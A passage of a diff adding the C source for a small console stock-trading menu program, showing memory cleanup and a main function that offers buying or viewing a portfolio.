*next = NULL; + while (current) { + next = current->next; + free(current); + current = next; + } + free(p); +} + +int main(int argc, char *argv[]) +{ + setbuf(stdout, NULL); + srand(time(NULL)); + Portfolio *p = initialize_portfolio(); + if (!p) { + printf("Memory failure\n"); + exit(1); + } + + int resp = 0; + + printf("Welcome back to the trading app!\n\n"); + printf("What would you like to do?\n"); + printf("1) Buy some stonks!\n"); + printf("2) View my portfolio\n"); + scanf("%d", &resp); + + if (resp == 1) { + buy_stonks(p); + } else if (resp == 2) { + view_portfolio(p); + } + + free_portfolio(p); + printf("Goodbye!\n"); + + exit(0); +}